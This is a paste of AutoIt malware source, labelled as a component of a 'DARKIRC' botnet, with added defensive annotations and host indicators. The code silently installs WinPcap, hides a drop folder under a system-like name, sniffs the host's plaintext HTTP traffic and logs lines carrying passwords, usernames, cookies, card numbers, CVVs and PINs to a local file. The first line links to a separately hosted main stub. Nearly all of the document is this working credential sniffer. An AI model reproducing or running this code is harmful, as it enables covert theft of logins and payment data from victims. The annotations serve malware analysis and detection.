KekSec

[AUTOSNIFFz] ORIGINAL DARKIRC BOTNET - CODED BY FREAK

Feb 25th, 2021 (edited)
  1. ; MAIN STUB HERE https://anonfiles.com/Pbn1G269q0/bot_au3
  ; ---------------------------------------------------------------------------
  ; Analyst annotation (defensive review of this paste).
  ; This listing is a sniffer component: if WinPcap is absent it downloads and
  ; silently installs it, then captures plaintext HTTP on adapter 0 and appends
  ; every payload line containing one of the keywords below to a local file.
  ; Nothing in this listing establishes persistence or sends the captured data
  ; anywhere; dump.dat is only written locally. The "MAIN STUB" named on line 1
  ; is not part of this paste, so its behaviour cannot be stated here.
  ;
  ; Host indicators that follow directly from the code below:
  ;   - %APPDATA%\Windows Shell Common Binary created with Hidden+System
  ;     attributes (installPCAP) and a growing plain-text dump.dat inside it
  ;   - %TEMP%\WinPcap_4_1_3.exe written and executed, its setup windows
  ;     driven by Alt-key sends, when System32\wpcap.dll does not exist
  ;   - a named semaphore whose name is decoded at run time from the hex
  ;     constant $sMutex (left undecoded here)
  ;   - a process loading wpcap.dll and packet.dll and enumerating adapters
  ;     with pcap_findalldevs_ex("rpcap://")
  ; ---------------------------------------------------------------------------
  2. #NoTrayIcon
  ; Build directives: UPX-packed output (stub.exe), asInvoker manifest so the
  ; stub itself requests no elevation, Tidy and Au3Stripper run before compile.
  3. #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
  4. #AutoIt3Wrapper_Outfile=stub.exe
  5. #AutoIt3Wrapper_Compression=4
  6. #AutoIt3Wrapper_UseUpx=y
  7. #AutoIt3Wrapper_Res_Language=1033
  8. #AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker
  9. #AutoIt3Wrapper_Run_Tidy=y
  10. #Tidy_Parameters=/gd /reel /sci 0 /kv 5 /sf
  11. #AutoIt3Wrapper_Tidy_Stop_OnError=n
  12. #AutoIt3Wrapper_Run_Au3Stripper=y
  13. #Au3Stripper_Parameters=/so /mi 5 /mo
  14. #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
  15. Opt("ExpandEnvStrings", 1)
  16.  
  ; Drop location (hidden+system dir, see installPCAP) and the capture log.
  17. Global $installdir = @AppDataDir & '\Windows Shell Common Binary'
  18. Global $lootLoc = $installdir & "\dump.dat"
  ; BPF filter fragment: only unencrypted HTTP on these four ports is captured.
  19. Global $sniffopt = "tcp port (80 or 8080 or 8888 or 8181)"
  ; Semaphore name stored as a hex blob and decoded at run time (not decoded here).
  20. Global Const $sMutex = BinaryToString("0x1337FF207F2838EEEBD6E4F2EF23323727FAEDCBECFE31263F25D4F1C6E4F0EF2A343225E9EFD0E6FF7A2B2125E4E5D0E8F137253F41FF1337")
  21.  
  ; Second instance exits immediately (flag 0 in _Singleton -> Exit -1).
  22. _Singleton($sMutex)
  ; Unattended WinPcap 4.1.3 install: download to %TEMP%, run, and step through
  ; the installer dialogs with Alt+N / Alt+A / a button click / Alt+F. The file
  ; is used as downloaded; no integrity check is visible in this listing.
  23. If Not FileExists(@SystemDir & "\wpcap.dll") Then
  24.     InetGet("https://www.winpcap.org/install/bin/WinPcap_4_1_3.exe", @TempDir & "\WinPcap_4_1_3.exe")
  25.     Run(@TempDir & "\WinPcap_4_1_3.exe")
  26.     WinWaitActive("WinPcap 4.1.3 Setup", "Welcome to the WinPcap")
  27.     Send("!n")
  28.     WinWaitActive("WinPcap 4.1.3 Setup", "License Agreement")
  29.     Send("!a")
  30.     WinWaitActive("WinPcap 4.1.3 Setup", "Installation options")
  31.     ControlClick("WinPcap 4.1.3 Setup", "Installation options", "[CLASS:Button; INSTANCE:2]")
  32.     WinWaitActive("WinPcap 4.1.3 Setup", "Completing the WinPcap")
  33.     Send("!f")
  34. EndIf
  ; Despite its name this only creates the hidden drop directory.
  35. installPCAP()
  ; Open wpcap.dll and initialise the $Pcap_* globals (return value unused).
  36. $winpcap = _PcapSetup()
  37. $pcap_devices = _PcapGetDeviceList()
  ; Adapter 0 only. Column [7] of the device list is the adapter's IPv4 address,
  ; so the filter becomes "host <own IPv4> and tcp port (...)": non-promiscuous,
  ; 64 KiB snaplen, 16 MiB kernel buffer, realtime flag 0 (see _PcapStartCapture).
  38. $iface = 0
  39. $pcap = _PcapStartCapture($pcap_devices[$iface][0], "host " & $pcap_devices[$iface][7] & " and " & $sniffopt, 0, 65536, 2 ^ 24, 0)
  ; Match list: [0]-[4] and [19] are HTTP request-line/header prefixes; [5]-[18]
  ; are form field names associated with logins and payment-card entry.
  40. Dim $keywords[20]
  41. $keywords[0] = "GET /"
  42. $keywords[1] = "POST /"
  43. $keywords[2] = "Host: "
  44. $keywords[3] = "User-Agent: "
  45. $keywords[4] = "Content-"
  46. $keywords[5] = "password="
  47. $keywords[6] = "user_name="
  48. $keywords[7] = "user="
  49. $keywords[8] = "Username="
  50. $keywords[9] = "User="
  51. $keywords[10] = "login="
  52. $keywords[11] = "email="
  53. $keywords[12] = "username="
  54. $keywords[13] = "holder="
  55. $keywords[14] = "number="
  56. $keywords[15] = "cvv="
  57. $keywords[16] = "pin="
  58. $keywords[17] = "transaction"
  59. $keywords[18] = "bank"
  60. $keywords[19] = "Cookie: "
  ; Mode 1 = open for append; the handle stays open for the life of the process.
  61. $lootHandle = FileOpen($lootLoc, 1)
  62. $sPacketText = ""
  63. $oldPacketText = ""
  ; Capture loop. _TCP_Recv returns a 21-element array (or -1 on timeout, in
  ; which case UBound is 0 and the loop simply polls again without sleeping).
  64. While True
  65.     $aPacket = _TCP_Recv($pcap)
  66.     If UBound($aPacket) > 20 Then
  ; [20] is the hex payload after the fixed 54-byte header slice in _TCP_Recv,
  ; turned back into raw text here.
  67.         $sPacketText = BinaryToString("0x" & $aPacket[20])
  ; Skip a payload identical to the previous one (retransmits / duplicates).
  68.         If $sPacketText = $oldPacketText Then
  69.             Sleep(250)
  70.             ContinueLoop
  71.         EndIf
  72.         If StringLen($sPacketText) > 13 Then
  73.             For $key = 0 To UBound($keywords) - 1
  74.                 If StringInStr($sPacketText, $keywords[$key]) Then
  ; [14] is the destination port; 6667 (conventional IRC port) aborts the
  ; keyword loop so that packet is never logged -- apparently to keep IRC
  ; traffic out of the dump. Note the BPF filter above already limits
  ; capture to the four HTTP ports, so this branch is rarely reachable.
  75.                     If Dec(Hex(BinaryToString("0x" & $aPacket[14]))) = 6667 Then ExitLoop
  ; Split the payload into lines (CR stripped, LF-delimited) and append every
  ; line that contains the current keyword, flushing after each write -- so
  ; dump.dat grows on every hit, which file-monitoring can observe.
  76.                     $aPacketText = StringSplit(StringReplace($sPacketText, @CR, ""), @LF)
  77.                     For $aPT = 1 To UBound($aPacketText) - 1
  78.                         If StringInStr($aPacketText[$aPT], $keywords[$key]) Then
  79.                             FileWriteLine($lootHandle, $aPacketText[$aPT])
  80.                             FileFlush($lootHandle)
  81.                             $oldPacketText = $sPacketText
  82.                         EndIf
  83.                     Next
  84.                     $oldPacketText = $sPacketText
  85.                 Else
  ; Runs once per non-matching keyword. ConsoleWrite output of a compiled GUI
  ; script is normally not visible unless stdout is captured by a parent.
  86.                     ConsoleWrite($sPacketText & @CRLF)
  87.                 EndIf
  88.             Next
  89.         EndIf
  90.     EndIf
  91.     $oldPacketText = $sPacketText
  92. WEnd
  ; Enumerate local adapters through WinPcap (pcap_findalldevs_ex with the
  ; "rpcap://" source) and return a 2-D array with one row per adapter:
  ;   [0] rpcap:// device name         [1] description
  ;   [2] link type id  [3] link type name  [4] link type description
  ;   [5] link speed (PacketGetNetType)  [6] MAC as aa:bb:cc:dd:ee:ff
  ;   [7] IPv4 address  [8] IPv4 netmask  [9] IPv4 broadcast
  ;  [10] IPv6 address [11] IPv6 netmask [12] IPv6 broadcast
  ;  [13] pcap_if flags
  ; Returns -1 if the DllCall fails or pcap_findalldevs_ex reports -1.
  ; Needs $Pcap_dll and $Pcap_errbuf, which _PcapSetup() creates.
  93. Func _PcapGetDeviceList()
  94.     Local $alldevs = DllStructCreate("ptr")
  95.     Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_findalldevs_ex", "str", "rpcap://", "ptr", 0, "ptr", DllStructGetPtr($alldevs), "ptr", DllStructGetPtr($Pcap_errbuf))
  96.     If (@error > 0) Then Return -1
  97.     If $r[0] = -1 Then Return -1
  98.     Local $next = DllStructGetData($alldevs, 1)
  99.     Local $list[1][14]
  100.     Local $i = 0
  ; Walk the singly linked list of pcap_if structs.
  101.     While ($next <> 0)
  102.         Local $pcap_if = DllStructCreate("ptr next;ptr name;ptr desc;ptr addresses;uint flags", $next)
  ; C strings are measured with lstrlen and copied out as char[len+1].
  103.         Local $len_name = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 2))
  104.         Local $len_desc = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 3))
  105.         $list[$i][0] = DllStructGetData(DllStructCreate("char[" & ($len_name[0] + 1) & "]", DllStructGetData($pcap_if, 2)), 1)
  106.         $list[$i][1] = DllStructGetData(DllStructCreate("char[" & ($len_desc[0] + 1) & "]", DllStructGetData($pcap_if, 3)), 1)
  107.         Local $next_addr = DllStructGetData($pcap_if, "addresses")
  ; Drop the 8-character "rpcap://" prefix to get the raw NPF device name
  ; that packet.dll's PacketOpenAdapter expects.
  108.         Local $device = StringTrimLeft($list[$i][0], 8)
  109.         Local $snames = DllStructCreate("char Name[" & (StringLen($device) + 1) & "]")
  110.         DllStructSetData($snames, 1, $device)
  111.         Local $handle = DllCall("packet.dll", "ptr:cdecl", "PacketOpenAdapter", "ptr", DllStructGetPtr($snames))
  112.         If IsPtr($handle[0]) Then
  ; OID 0x01010102 is OID_802_3_CURRENT_ADDRESS: a 6-byte MAC query.
  113.             Local $packetoiddata = DllStructCreate("ulong oid;ulong length;ubyte data[6]")
  114.             DllStructSetData($packetoiddata, 1, 0x01010102)
  115.             DllStructSetData($packetoiddata, 2, 6)
  116.             Local $status = DllCall("packet.dll", "byte:cdecl", "PacketRequest", "ptr", $handle[0], "byte", 0, "ptr", DllStructGetPtr($packetoiddata))
  117.             If $status[0] Then
  ; $mac is handled as its "0x..." hex string: skip the prefix, insert colons.
  118.                 Local $mac = DllStructGetData($packetoiddata, 3)
  119.                 $list[$i][6] = StringMid($mac, 3, 2) & ":" & StringMid($mac, 5, 2) & ":" & StringMid($mac, 7, 2) & ":" & StringMid($mac, 9, 2) & ":" & StringMid($mac, 11, 2) & ":" & StringMid($mac, 13, 2)
  120.             EndIf
  ; Field 2 of the NetType struct is the link speed.
  121.             Local $nettype = DllStructCreate("uint type;uint64 speed")
  122.             $status = DllCall("packet.dll", "byte:cdecl", "PacketGetNetType", "ptr", $handle[0], "ptr", DllStructGetPtr($nettype))
  123.             If $status[0] Then
  124.                 $list[$i][5] = DllStructGetData($nettype, 2)
  125.             EndIf
  126.             DllCall("packet.dll", "none:cdecl", "PacketCloseAdapter", "ptr", $handle[0])
  127.         EndIf
  ; Open the adapter briefly with a throw-away filter just to read its
  ; link-layer type, then close it again.
  128.         Local $pcap = _PcapStartCapture($list[$i][0], "host 1.2.3.4", 0, 32)
  129.         If IsPtr($pcap) Then
  130.             Local $types = _PcapGetLinkType($pcap)
  131.             If IsArray($types) Then
  132.                 $list[$i][2] = $types[0]
  133.                 $list[$i][3] = $types[1]
  134.                 $list[$i][4] = $types[2]
  135.             EndIf
  136.             _PcapStopCapture($pcap)
  137.         EndIf
  ; Walk the adapter's address list. Struct fields 2..4 are addr, netmask and
  ; broadaddr; the formatted length selects the column: IPv6 text (> 15 chars)
  ; goes to [10]-[12], dotted IPv4 (7..15 chars) to [7]-[9], anything shorter
  ; (empty / unknown family) is dropped.
  138.         While $next_addr <> 0
  139.             Local $pcap_addr = DllStructCreate("ptr next;ptr addr;ptr netmask;ptr broadaddr;ptr dst", $next_addr)
  140.             Local $j, $addr
  141.             For $j = 2 To 4
  142.                 $addr = _PcapSock2addr(DllStructGetData($pcap_addr, $j))
  143.                 If StringLen($addr) > 15 Then
  144.                     $list[$i][$j + 8] = $addr
  145.                 ElseIf StringLen($addr) > 6 Then
  146.                     $list[$i][$j + 5] = $addr
  147.                 EndIf
  148.             Next
  149.             $next_addr = DllStructGetData($pcap_addr, 1)
  150.         WEnd
  151.         $list[$i][13] = DllStructGetData($pcap_if, 5)
  152.         $next = DllStructGetData($pcap_if, 1)
  153.         $i += 1
  ; Grow the result only when another adapter follows.
  154.         If $next <> 0 Then ReDim $list[$i + 1][14]
  155.     WEnd
  156.     DllCall($Pcap_dll, "none:cdecl", "pcap_freealldevs", "ptr", DllStructGetData($alldevs, 1))
  157.     Return $list
  158. EndFunc   ;==>_PcapGetDeviceList
  ; Query the link-layer type of an open capture handle.
  ; Returns [0] pcap_datalink id, [1] its short name, [2] its description,
  ; or -1 when $pcap is not a pointer.
  159. Func _PcapGetLinkType($pcap)
  160.     If Not IsPtr($pcap) Then Return -1
  161.     Local $type[3]
  162.     Local $t = DllCall($Pcap_dll, "int:cdecl", "pcap_datalink", "ptr", $pcap)
  163.     $type[0] = $t[0]
  164.     Local $name = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_name", "int", $t[0])
  165.     $type[1] = $name[0]
  166.     Local $desc = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_description", "int", $t[0])
  167.     $type[2] = $desc[0]
  168.     Return $type
  169. EndFunc   ;==>_PcapGetLinkType
  ; Fetch one packet with pcap_next_ex. Return codes are pcap's own (0 timeout,
  ; -1 error, -2 EOF) when no packet is available, otherwise a 4-element array
  ; described in the trailing comment. The header/packet pointer structs are
  ; re-created in the $Pcap_ptrhdr / $Pcap_ptrpkt globals on every call, and
  ; the $Pcap_statV / $Pcap_statN counters are advanced.
  170. Func _PcapGetPacket($pcap) ; return 0: timeout, -1:error, -2:EOF in file or if successfull array[0]=time [1]=captured len [2]=packet len [3]=packet data
  171.     If Not IsPtr($pcap) Then Return -1
  172.     $Pcap_ptrhdr = DllStructCreate("ptr")
  173.     $Pcap_ptrpkt = DllStructCreate("ptr")
  174.     Local $pk[4]
  175.     Local $res = DllCall($Pcap_dll, "int:cdecl", "pcap_next_ex", "ptr", $pcap, "ptr", DllStructGetPtr($Pcap_ptrhdr), "ptr", DllStructGetPtr($Pcap_ptrpkt))
  176.     If ($res[0] <> 1) Then Return $res[0]
  ; pcap_pkthdr: timeval seconds/microseconds, captured length, wire length.
  177.     Local $pkthdr = DllStructCreate("int s;int us;int caplen;int len", DllStructGetData($Pcap_ptrhdr, 1))
  178.     Local $packet = DllStructCreate("ubyte[" & DllStructGetData($pkthdr, 3) & "]", DllStructGetData($Pcap_ptrpkt, 1))
  ; Local time of day: epoch seconds plus the registry-derived bias, mod one day,
  ; rendered as HH:MM:SS.uuuuuu.
  179.     Local $time_t = Mod(DllStructGetData($pkthdr, 1) + $Pcap_timebias, 86400)
  180.     $pk[0] = StringFormat("%02d:%02d:%02d.%06d", Int($time_t / 3600), Int(Mod($time_t, 3600) / 60), Mod($time_t, 60), DllStructGetData($pkthdr, 2))
  181.     $pk[1] = DllStructGetData($pkthdr, 3)
  182.     $pk[2] = DllStructGetData($pkthdr, 4)
  ; [3] is the captured bytes as an AutoIt Binary (callers such as _TCP_Recv
  ; slice its "0x..." string form).
  183.     $pk[3] = DllStructGetData($packet, 1)
  184.     $Pcap_statV += $pk[2]
  185.     $Pcap_statN += 1
  186.     Return $pk
  187. EndFunc   ;==>_PcapGetPacket
  ; Inject a raw frame with pcap_sendpacket; returns its result, or -1 when
  ; $pcap is not a pointer. Part of the bundled WinPcap wrapper -- not called
  ; anywhere in this listing.
  188. Func _PcapSendPacket($pcap, $data) ; data in Binary Format
  189.     If Not IsPtr($pcap) Then Return -1
  190.     Local $databuffer = DllStructCreate("ubyte[" & BinaryLen($data) & "]")
  191.     DllStructSetData($databuffer, 1, $data)
  192.     Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_sendpacket", "ptr", $pcap, "ptr", DllStructGetPtr($databuffer), "int", BinaryLen($data))
  193.     Return $r[0]
  194. EndFunc   ;==>_PcapSendPacket
  ; Load System32\wpcap.dll and declare the $Pcap_* globals used by the other
  ; wrapper functions. Returns pcap_lib_version() text, or -1 if the DLL is
  ; missing or the version call fails.
  195. Func _PcapSetup()    ; return WinPCAP version as full text or -1 if winpcap is not installed, and opens dll
  196.     If Not FileExists(@SystemDir & "\wpcap.dll") Then Return -1
  197.     Global $Pcap_dll = DllOpen(@SystemDir & "\wpcap.dll")
  198.     Global $Pcap_errbuf = DllStructCreate("char[256]")
  199.     Global $Pcap_ptrhdr = 0
  200.     Global $Pcap_ptrpkt = 0
  201.     Global $Pcap_statV        ; Total volume captured
  202.     Global $Pcap_statN        ; Total number of packets captured
  203.     Global $Pcap_starttime    ; Start time of Capture
  ; ActiveTimeBias is the UTC offset in minutes stored as a DWORD; 2^32 minus
  ; that value, times 60, becomes the seconds bias _PcapGetPacket adds to
  ; timestamps. Sign handling for west-of-UTC (positive) biases is not verified here.
  204.     Global $Pcap_timebias = (2 ^ 32 - RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "ActiveTimeBias")) * 60
  205.     Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_lib_version")
  206.     If (@error > 0) Then Return -1
  207.     Return $v[0]
  208. EndFunc   ;==>_PcapSetup
  ; Format a sockaddr pointed to by $sockaddr_ptr as text.
  ; Family 2 (AF_INET) -> dotted quad; family 23 (AF_INET6 on Windows) ->
  ; eight colon-separated 4-hex-digit groups (no :: compression).
  ; Returns "" for a null pointer or any other family.
  209. Func _PcapSock2addr($sockaddr_ptr)
  210.     If ($sockaddr_ptr = 0) Then Return ""
  211.     Local $sockaddr = DllStructCreate("ushort family;char data[14]", $sockaddr_ptr)
  212.     Local $family = DllStructGetData($sockaddr, 1)
  213.     If ($family = 2) Then
  214.         Local $sockaddr_in = DllStructCreate("short family;ushort port;ubyte addr[4];char zero[8]", $sockaddr_ptr)
  215.         Return DllStructGetData($sockaddr_in, 3, 1) & "." & DllStructGetData($sockaddr_in, 3, 2) & "." & DllStructGetData($sockaddr_in, 3, 3) & "." & DllStructGetData($sockaddr_in, 3, 4)
  216.     EndIf
  217.     If ($family = 23) Then
  218.         Local $sockaddr_in6 = DllStructCreate("ushort family;ushort port;uint flow;ubyte addr[16];uint scope", $sockaddr_ptr)
  ; $bin is used as its "0x" + 32-hex-digit string form, hence the offset of 3.
  219.         Local $bin = DllStructGetData($sockaddr_in6, 4)
  220.         Local $i, $ipv6
  221.         For $i = 0 To 7
  222.             $ipv6 &= StringMid($bin, 3 + $i * 4, 4) & ":"
  223.         Next
  224.         Return StringTrimRight($ipv6, 1)
  225.     EndIf
  226.     Return ""
  227. EndFunc   ;==>_PcapSock2addr
  ; Open $DeviceName for capture and return the pcap_t pointer, or -1 on failure.
  ;   $filter      BPF expression compiled with optimize=1, netmask 0 ("" = none)
  ;   $promiscuous passed straight to pcap_open
  ;   $PacketLen   snapshot length
  ;   $buffersize  kernel buffer size via pcap_setbuff when > 0 (WinPcap extension)
  ;   $realtime    when non-zero, pcap_setmintocopy(1) so packets are delivered
  ;                without waiting to batch (WinPcap extension)
  ; The read timeout is fixed at 1000 ms and the handle is set non-blocking.
  ; Filter errors are written to $Pcap_errbuf as "Filter: <pcap_geterr>" and the
  ; handle is closed. Also resets the $Pcap_stat* globals and $Pcap_starttime.
  228. Func _PcapStartCapture($DeviceName, $filter = "", $promiscuous = 0, $PacketLen = 65536, $buffersize = 0, $realtime = 1)
  229.     Local $handle = DllCall($Pcap_dll, "ptr:cdecl", "pcap_open", "str", $DeviceName, "int", $PacketLen, "int", $promiscuous, "int", 1000, "ptr", 0, "ptr", DllStructGetPtr($Pcap_errbuf))
  230.     If (@error > 0) Then Return -1
  231.     If ($handle[0] = 0) Then Return -1
  232.     DllCall($Pcap_dll, "int:cdecl", "pcap_setnonblock", "ptr", $handle[0], "int", 1, "ptr", DllStructGetPtr($Pcap_errbuf))
  233.     If ($filter <> "") Then
  234.         Local $fcode = DllStructCreate("UINT;ptr")
  235.         Local $comp = DllCall($Pcap_dll, "int:cdecl", "pcap_compile", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode), "str", $filter, "int", 1, "int", 0)
  236.         If ($comp[0] = -1) Then
  237.             Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
  238.             DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
  239.             _PcapStopCapture($handle[0])
  240.             Return -1
  241.         EndIf
  242.         Local $set = DllCall($Pcap_dll, "int:cdecl", "pcap_setfilter", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode))
  243.         If ($set[0] = -1) Then
  244.             Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
  245.             DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
  246.             _PcapStopCapture($handle[0])
  247.             Return -1
  ; Placed after Return, so this line never executes.
  248.             DllCall($Pcap_dll, "none:cdecl", "pcap_freecode", "ptr", $fcode)
  249.         EndIf
  250.     EndIf
  251.     If $buffersize > 0 Then DllCall($Pcap_dll, "int:cdecl", "pcap_setbuff", "ptr", $handle[0], "int", $buffersize)
  252.     If $realtime Then DllCall($Pcap_dll, "int:cdecl", "pcap_setmintocopy", "ptr", $handle[0], "int", 1)
  253.     $Pcap_statV = 0
  254.     $Pcap_statN = 0
  255.     $Pcap_starttime = TimerInit()
  256.     Return $handle[0]
  257. EndFunc   ;==>_PcapStartCapture
  ; Close a capture handle with pcap_close; a non-pointer argument is ignored.
  258. Func _PcapStopCapture($pcap)
  259.     If Not IsPtr($pcap) Then Return
  260.     DllCall($Pcap_dll, "none:cdecl", "pcap_close", "ptr", $pcap)
  261. EndFunc   ;==>_PcapStopCapture
  ; Single-instance guard of the same shape as AutoIt's Misc.au3 _Singleton:
  ; create a named semaphore and, if it already exists (ERROR_ALREADY_EXISTS),
  ; either terminate the process with exit code -1 ($flag = 0) or set @error
  ; and return 0. Otherwise returns the semaphore handle, which is never closed
  ; so the name stays owned for the process lifetime. From a host-monitoring
  ; view the named object is an observable artefact of a running copy.
  262. Func _Singleton($occurenceName, $flag = 0)
  263.     Local $ERROR_ALREADY_EXISTS = 183
  ; Backslashes are not legal in a kernel object name (except the Global\/Local\
  ; namespace prefixes), so they are stripped.
  264.     $occurenceName = StringReplace($occurenceName, "\", "") ; to avoid error
  265.     Local $handle = DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $occurenceName)
  266.     ;    Local $handle = DllCall("kernel32.dll", "int", "CreateMutex", "int", 0, "long", 1, "str", $occurenceName)
  ; Separate GetLastError DllCall right after CreateSemaphore; whether the
  ; value survives the intervening AutoIt work is assumed, not shown here.
  267.     Local $lastError = DllCall("kernel32.dll", "int", "GetLastError")
  268.     If $lastError[0] = $ERROR_ALREADY_EXISTS Then
  269.         If $flag = 0 Then
  270.             Exit -1
  271.         Else
  272.             SetError($lastError[0]) ;<---flag <>0 so set @error to $ERROR_ALREADY_EXISTS
  273.             Return 0
  274.         EndIf
  275.     EndIf
  276.     Return $handle[0]
  277. EndFunc   ;==>_Singleton
  278.  
  ; Poll $hCapture for up to $iTimeOut ms (-1 = forever) and return the
  ; $iInstance-th packet (0-based) sliced into a 21-element array of hex
  ; strings; returns -1 on timeout.
  ; The packet is handled as its "0x..." hex string, so character position 3 is
  ; byte 0 and each byte is two characters. The offsets are fixed: 14-byte
  ; Ethernet header, then a 20-byte IPv4 header, then a 20-byte TCP header, so
  ; [20] is everything from byte 54 onward. No check is made that the frame
  ; really is IPv4/TCP; the caller's BPF filter is what restricts that.
  ; $iPacket is declared but never assigned before the `= $iInstance` test; this
  ; relies on an unassigned Local comparing equal to 0 -- confirm against the
  ; AutoIt version used.
  279. Func _TCP_Recv($hCapture, $iInstance = 0, $iTimeOut = 3000)
  280.     Local $blPacketCaptured = False, $iTimer_Capture, $aPacket, $iPacket
  281.     $iTimer_Capture = TimerInit()
  282.     While (TimerDiff($iTimer_Capture) < $iTimeOut Or $iTimeOut = -1)
  283.         $aPacket = _PcapGetPacket($hCapture)
  284.         If IsArray($aPacket) Then
  285.             If $iPacket = $iInstance Then
  286.                 Local $aTCPPacket[21]
  ; Ethernet header (bytes 0-13).
  287.                 $aTCPPacket[0] = StringMid($aPacket[3], 3, 12) ;Destination Mac Address
  288.                 $aTCPPacket[1] = StringMid($aPacket[3], 15, 12) ;Source Mac Address
  289.                 $aTCPPacket[2] = StringMid($aPacket[3], 27, 4) ;Type
  ; IPv4 header (bytes 14-33), assumed to be 20 bytes.
  290.                 $aTCPPacket[3] = StringMid($aPacket[3], 31, 2) ;Version & Header length
  291.                 $aTCPPacket[4] = StringMid($aPacket[3], 33, 2) ;Differientiated Services Field
  292.                 $aTCPPacket[5] = StringMid($aPacket[3], 35, 4) ;Total Length
  293.                 $aTCPPacket[6] = StringMid($aPacket[3], 39, 4) ;Identification
  294.                 $aTCPPacket[7] = StringMid($aPacket[3], 43, 4) ;Fragment offset
  295.                 $aTCPPacket[8] = StringMid($aPacket[3], 47, 2) ;Time to live
  296.                 $aTCPPacket[9] = StringMid($aPacket[3], 49, 2) ;Protocol
  297.                 $aTCPPacket[10] = StringMid($aPacket[3], 51, 4) ;Header checksum
  298.                 $aTCPPacket[11] = StringMid($aPacket[3], 55, 8) ;Source IP Address
  299.                 $aTCPPacket[12] = StringMid($aPacket[3], 63, 8) ;Destination IP Address
  ; TCP header (bytes 34-53), assumed to be 20 bytes; the urgent pointer
  ; (bytes 52-53) is skipped rather than stored.
  300.                 $aTCPPacket[13] = StringMid($aPacket[3], 71, 4) ;Source port
  301.                 $aTCPPacket[14] = StringMid($aPacket[3], 75, 4) ;Destination port
  302.                 $aTCPPacket[15] = StringMid($aPacket[3], 79, 8) ;Sequence number
  303.                 $aTCPPacket[16] = StringMid($aPacket[3], 87, 8) ;Acknowledgment number
  304.                 $aTCPPacket[17] = StringMid($aPacket[3], 95, 4) ;Flags
  305.                 $aTCPPacket[18] = StringMid($aPacket[3], 99, 4) ;Window size value
  306.                 $aTCPPacket[19] = StringMid($aPacket[3], 103, 4) ;Checksum
  ; Everything after the 110-character prefix ("0x" + 54 bytes).
  307.                 $aTCPPacket[20] = StringTrimLeft($aPacket[3], 110) ;Data
  308.                 Return $aTCPPacket
  309.             EndIf
  310.             $iPacket += 1
  311.         EndIf
  312.     WEnd
  313.     Return -1
  314. EndFunc   ;==>_TCP_Recv
  315.  
  ; Misnamed: does not install WinPcap. Creates the drop directory $installdir
  ; (%APPDATA%\Windows Shell Common Binary) and marks it Hidden+System so it is
  ; not shown by default in Explorer. A hidden+system folder of this name under
  ; a user's AppData is a direct host indicator for this component.
  316. Func installPCAP()
  317.     DirCreate($installdir)
  318.     FileSetAttrib($installdir, "+SH")
  319. EndFunc   ;==>installPCAP
  320.  